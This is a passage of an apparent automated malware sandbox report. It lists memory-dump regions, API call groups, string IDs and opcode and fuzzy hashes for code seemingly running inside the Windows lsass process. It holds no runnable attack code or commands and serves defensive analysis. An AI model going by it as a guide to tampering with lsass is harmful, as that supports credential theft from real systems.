                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: f91ee8fe901406613b15348f4025a55179d36af529a06dc3e67d0a83290e2be9
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: CB117023A1CF15C6F6551168E4DE36E10C17F58774F1B0A27AB760A6EBCA6A884D8304
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: d631859e168add869cba79a613aa8253b7e1d362d694c9bc9a53cf1fe5efaa0a
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: BA118637A90F11C9F6547128E4DD36D1051AB563F8F5B0727ABB6067D7CA2A888D420C
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$r iterator'
                                                  • API String ID: 3242871069-2773574969
                                                  • Opcode ID: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction ID: c3a8cf3fc0483c4c8d84a18abeed2cd52bd1049ffcec9af8a9abf0d1fa57f58d
                                                  • Opcode Fuzzy Hash: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction Fuzzy Hash: 9A518C32311B00CAFB54CF25E48CB6C77A5E744B98F169127EB5A4778ADBB9C949C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction ID: a0029c19bd48d39bdd11a3f70c977baa00a45e651eaf2daa0a9861332165d5f2
                                                  • Opcode Fuzzy Hash: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction Fuzzy Hash: E951B132311780CAFB58CB15E48CB6C7396E744B88F168123EBA94778ADB79D869C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction ID: e7bfd145404eeafb6eb5c89ce82882276eead3ef8f290f671e3acf77f7492d48
                                                  • Opcode Fuzzy Hash: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction Fuzzy Hash: 2861AE32514BC4C1EB61DB15E48839EB7A0F795B98F054217EBE907B9ACB78D1A8CF00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: debb6acfa00521520db8fe202e156f6f13c5db5b97d6b8121079bc8d2ef83d79
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 0E515A32200780CAFB748F25958C35D7BA0F765B95F1A8117EB9947BD6CB38D8A9CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: 8e4d8857978e4d0aa653d4bc2906969f0468040c348b549ad75dcc73aea3f7dc
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 715147325243C0CAFA648B2595CC35E76A4F395B94F1A8127DBE947BD7CB38D469CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction ID: 167e81ce6a904b4b81e7a7084ab4107fa7d33615f5871cb068a3512d8bfae3fe
                                                  • Opcode Fuzzy Hash: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction Fuzzy Hash: DD118922318BC1D5FB109725E89C39E53A4F784780F9244279FA9D3796EF29C96DC710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction ID: a1efeab4c3dd5baefbacb05a6f5eef6e7c9264804103d6cc7885adfffb5aeae3
                                                  • Opcode Fuzzy Hash: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction Fuzzy Hash: A9318F23705B91C3FA14CF96D58C7AD67A0BB64B80F0A81278FD947B56EB34C4798700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction ID: 7e64178fe159d021bbd495482dd68ca6e9378b350d830ecc9254620396b45299
                                                  • Opcode Fuzzy Hash: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction Fuzzy Hash: 6DD18872B04B80CAF711CBA9D4883AC37A1F744B98F164217DF599BB9ADA39C51AC340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction ID: a1c6f865277a58845c602a504900460568279cf66f12f12902d9f1ee58e990f4
                                                  • Opcode Fuzzy Hash: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction Fuzzy Hash: B4015732610B90C6E708DFA6A88C14D77A0F788F80F0A4527DB5943729DF34D169C744
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF32BB), ref: 00000202C0AF33EC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000202C0AF32BB), ref: 00000202C0AF3477
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction ID: 88075c9ee83820c96002640d87a8f0b4056d847ef2a50952a61ebec5fb1df4bb
                                                  • Opcode Fuzzy Hash: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction Fuzzy Hash: 86910D73708750C9FB61DF6994CC3AD6BA4B740B89F16410BDF0A67A86CB36C88AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction ID: 3636b1313182d2ca72e0a4b345bdc0e8417ee1fabd3be75c0293dc5021ab8d58
                                                  • Opcode Fuzzy Hash: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction Fuzzy Hash: D6112E22710F00CAFB00CF60E8983AD33A4F719758F450E22EB6D867A5EF78C5688340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction ID: 777d0e110949a7bb2f2459cb4d2a7a1a238db46bcb8cb949d1d30d46d3dffee3
                                                  • Opcode Fuzzy Hash: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction Fuzzy Hash: 7A618D32504BC4C6EB708F15E48839EB7A0F799B98F054217EBD907B9ADB78D198CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction ID: 2385ede4c05ed4cd4ce949236a2343a0d59da76c3f295c50dea322a88cf70941
                                                  • Opcode Fuzzy Hash: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction Fuzzy Hash: 2751BC326087C1C2F664DA2AA5EC3AE6791F3C5780F464127DFE903B9BDA39C5698740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction ID: 9d741272f38edf587ea3971193cb7f33abd4730cb4e12eec5eb19689929ba1e7
                                                  • Opcode Fuzzy Hash: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction Fuzzy Hash: B1418063718B80C2EB209F25E48C3AEA7A1F798784F454123EB4D87799EF79C549C744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction ID: 7e13b1f924a72fa592857f10511489483069fd8fe9e49296e5daf9cad8d9aa75
                                                  • Opcode Fuzzy Hash: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction Fuzzy Hash: 71115B32214B8082EB658F15E88824D77E0F788B84F194222EFDD07765DF39C9658B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `managed vector destructor iterator'$ure'
                                                  • API String ID: 592178966-1581490017
                                                  • Opcode ID: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction ID: 880af3b1f2b7196e8583c535e0aff1ce1dd12800c73e6970804ab59fdaa74922
                                                  • Opcode Fuzzy Hash: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction Fuzzy Hash: F3E08661651B48D0EF018F25E48829C7368DB59B54B4A91239A5C06322FA38D1EDC310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `eh vector copy constructor iterator'$ure'
                                                  • API String ID: 592178966-2675205102
                                                  • Opcode ID: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction ID: a0e59305910782379b711ab03b8ff8df1e8349c3885270a983ea66c7e26dbf97
                                                  • Opcode Fuzzy Hash: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction Fuzzy Hash: 00E08661611B48D0EF018F25E48419C7368EB58B44B4A9123CA5C06322EA38D1E9C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000003.1746372626.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_3_202c0ab0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID: vector constructor iterator'$lue
                                                  • API String ID: 1875163511-1709709380
                                                  • Opcode ID: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction ID: 85ac087563426b811aeaa0c14078f04391bc27fbbf0b5c1ecb27a0f301d43e91
                                                  • Opcode Fuzzy Hash: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction Fuzzy Hash: 6CD01C22211B88D1EE10EB08E8CC38C6330F388308FA24013924C825B6DF79CA8AC380
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction ID: fd17c287b83d1c171ba187f6f231eb2252f9eb0bb9469ea8dfbc41d2d7822ced
                                                  • Opcode Fuzzy Hash: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction Fuzzy Hash: AB115B26A11B90C1FA04CBA6A84C21D67A0F7C8FD0F6A4126DF8D93726DF39D95AC300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.3003986525.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                  • Associated: 00000007.00000002.3003477610.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004566818.00000202C0AF7000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3004922613.00000202C0B02000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005344422.00000202C0B04000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.3005737595.00000202C0B0A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_202c0ae0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction ID: 3e2f388a4548e7dad6dc00fcbcfb76f9701f7574e43e18e494eaccaba5cda833
                                                  • Opcode Fuzzy Hash: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction Fuzzy Hash: 22E0E572611B40C6F7089BA2D84C25D77A1FB88B15F4A8126CA0907321EF3A85AD8A14

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000002A661303605
                                                  • PathFindFileNameW.SHLWAPI ref: 000002A661303614
                                                    • Part of subcall function 000002A661303C40: StrCmpNIW.KERNELBASE(?,?,?,000002A661302513), ref: 000002A661303C58
                                                    • Part of subcall function 000002A661303B8C: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A66130362B), ref: 000002A661303B9A
